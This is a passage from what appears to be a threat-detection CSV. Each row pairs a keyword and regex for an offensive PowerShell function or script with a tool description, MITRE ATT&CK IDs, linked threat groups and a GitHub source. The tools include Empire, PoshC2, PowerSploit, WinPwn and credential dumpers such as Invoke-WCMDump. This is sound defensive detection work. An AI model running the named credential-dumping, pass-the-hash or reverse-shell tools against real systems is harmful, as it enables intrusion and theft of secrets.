Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-UsernameHarvestEAS*",".{0,1000}Invoke\-UsernameHarvestEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UsernameHarvestGmail*",".{0,1000}Invoke\-UsernameHarvestGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UsernameHarvestOWA*",".{0,1000}Invoke\-UsernameHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserRestrictedSidsCheck*",".{0,1000}Invoke\-UserRestrictedSidsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UserSessionListCheck*",".{0,1000}Invoke\-UserSessionListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-UsersHomeFolderCheck*",".{0,1000}Invoke\-UsersHomeFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-VaultListCheck*",".{0,1000}Invoke\-VaultListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-VeeamGetCreds*",".{0,1000}Invoke\-VeeamGetCreds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*Invoke-Vnc*",".{0,1000}Invoke\-Vnc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Vnc.ps1*",".{0,1000}Invoke\-Vnc\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-VNCServer.ps1*",".{0,1000}Invoke\-VNCServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VNCViewer.ps1*",".{0,1000}Invoke\-VNCViewer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VoiceTroll.ps1*",".{0,1000}Invoke\-VoiceTroll\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Vulmap*",".{0,1000}Invoke\-Vulmap.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-VulnerableADCSTemplates*",".{0,1000}Invoke\-VulnerableADCSTemplates.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-watson*",".{0,1000}Invoke\-watson.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","8","713","134","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z" "*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-WCMDump.ps1*",".{0,1000}Invoke\-WCMDump\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Invoke-WDigest.ps1*",".{0,1000}Invoke\-WDigest\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-WebCamAvi.ps1*",".{0,1000}Invoke\-WebCamAvi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-WebRequest https://tinyurl.com/*",".{0,1000}Invoke\-WebRequest\shttps\:\/\/tinyurl\.com\/.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*Invoke-WebRev.ps1*",".{0,1000}Invoke\-WebRev\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Whisker*",".{0,1000}Invoke\-Whisker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-WindowsEnum*",".{0,1000}Invoke\-WindowsEnum.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1082 - T1087 - T1057 - T1518 - T1016","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-WindowsUpdateCheck*",".{0,1000}Invoke\-WindowsUpdateCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-WinEnum*",".{0,1000}Invoke\-WinEnum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WinEnum.ps1*",".{0,1000}Invoke\-WinEnum\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-winrmsession*",".{0,1000}invoke\-winrmsession.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-WireTap*",".{0,1000}Invoke\-WireTap.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-WlanProfilesCheck*",".{0,1000}Invoke\-WlanProfilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-WmicDriveBy.*",".{0,1000}Invoke\-WmicDriveBy\..{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1059.001 - T1021.002 - T1566.002","TA0002 - TA0009 - TA0043","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-WmiCommand *",".{0,1000}Invoke\-WmiCommand\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-WmiCommand*",".{0,1000}Invoke\-WmiCommand.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Invoke-WMIExec *",".{0,1000}Invoke\-WMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*invoke-wmiexec *",".{0,1000}invoke\-wmiexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" 